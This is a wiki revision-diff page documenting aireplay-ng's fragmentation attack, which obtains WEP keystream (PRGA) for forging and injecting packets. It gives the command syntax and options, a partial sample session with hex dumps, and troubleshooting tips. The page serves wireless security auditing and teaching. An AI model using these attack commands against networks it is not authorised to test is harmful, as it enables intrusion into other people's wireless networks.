fragmentation
Differences
fragmentation [2007/03/10 23:22] – change to standard format and add troubleshooting info darkaudax | fragmentation [2007/04/29 21:30] – added additional usage and troubleshooting information darkaudax | ||
Line 1: | Line 1: | ||
+ | ====== Fragmentation Attack ====== | ||
+ | |||
+ | |||
+ | |||
+ | ===== Description ===== | ||
+ | This attack, when successful, can obtain 1500 bytes of PRGA (pseudo random generation algorithm). This attack does not recover the WEP key itself, but merely obtains the PRGA. The PRGA can then be used to generate packets with [[packetforge-ng]] which are in turn used for various injection attacks. | ||
+ | |||
+ | Basically, the program obtains a small amount of keying material from the packet then attempts to send ARP and/or LLC packets with known content to the access point (AP). If the packet is successfully echoed back by the AP then a larger amount of keying information can be obtained from the returned packet. | ||
+ | |||
+ | The original paper by Andrea Bittau at http:// | ||
+ | |||
+ | ===== Usage ===== | ||
+ | |||
+ | aireplay-ng -5 -b 00: | ||
+ | Where: | ||
+ | *-5 means run the fragmentation attack | ||
+ | *-b 00: | ||
+ | *-h 00: | ||
+ | *ath0 is the interface name | ||
+ | |||
+ | Optionally, the following filters can be applied: | ||
+ | *-b bssid : MAC address, Access Point | ||
+ | *-d dmac : MAC address, Destination | ||
+ | *-s smac : MAC address, Source | ||
+ | *-m len : minimum packet length | ||
+ | *-n len : maximum packet length | ||
+ | *-u type : frame control, type field | ||
+ | *-v subt : frame control, subtype field | ||
+ | *-t tods : frame control, To DS bit | ||
+ | *-f fromds : frame control, From DS bit | ||
+ | *-w iswep : frame control, WEP bit | ||
+ | |||
+ | Optionally, the following replay options can be set: | ||
+ | *-k IP : set destination IP in fragments - defaults to 255.255.255.255 | ||
+ | *-l IP : set source IP in fragments - defaults to 255.255.255.255 | ||
+ | |||
+ | |||
+ | ===== Usage Example ===== | ||
+ | |||
+ | |||
+ | |||
+ | Essentially you start the attack with the following command then select the packet you want to try:\\ | ||
+ | aireplay-ng -5 -b 00: | ||
+ | | ||
+ | Waiting for a data packet... | ||
+ | Read 96 packets... | ||
+ | | ||
+ | Size: 120, FromDS: 1, ToDS: 0 (WEP) | ||
+ | | ||
+ | | ||
+ | Dest. MAC = 00: | ||
+ | Source MAC = 00: | ||
+ | | ||
+ | 0x0000: | ||
+ | 0x0010: | ||
+ | 0x0020: | ||
+ | 0x0030: | ||
+ | 0x0040: | ||
+ | 0x0050: | ||
+ | 0x0060: | ||
+ | 0x0070: | ||
+ | | ||
+ | Use this packet ? y | ||
+ | |||
+ | The program responds (or similar): | ||
+ | |||
+ | | ||
+ | Data packet found! | ||
+ | | ||
+ | Got RELAYED packet!! | ||
+ | Thats our ARP packet! | ||
+ | | ||
+ | Got RELAYED packet!! | ||
+ | Thats our ARP packet! | ||
+ | | ||
+ | Got RELAYED packet!! | ||
+ | Thats our ARP packet! | ||
+ | | ||
+ | Now you can build a packet with packetforge-ng out of that 1500 bytes keystream | ||
+ | |||
+ | You have successfully obtained the PRGA which is stored in the file named by the program. | ||
+ | |||
+ | ===== Usage Tips ===== | ||
+ | |||
+ | *The source MAC address used in the attack must be associated with the access point. | ||
+ | |||
+ | *For madwifi-ng drivers (Atheros chipset), you must change MAC address of your card to the MAC address you will injecting with otherwise the attack will not work. See this [[faq# | ||
+ | |||
+ | * The fragmentation attack sends out a large number of packets that must all be received by the AP for the attack to be successful. | ||
+ | |||
+ | * The [[tutorial|tutorials page]] have a number of tutorials which utilize the fragmentation attack. | ||
+ | |||
+ | ===== Usage Troubleshooting ===== | ||
+ | |||
+ | * Make sure your card can successfully inject. | ||
+ | * Make sure the MAC you are using for injection is associated with the AP. | ||
+ | * Make sure you are on the same channel as the AP. | ||
+ | * Also see the general aireplay-ng troubleshooting ideas: [[aireplay-ng# | ||
+ | |||
fragmentation.txt · Last modified: 2009/09/05 23:32 by mister_x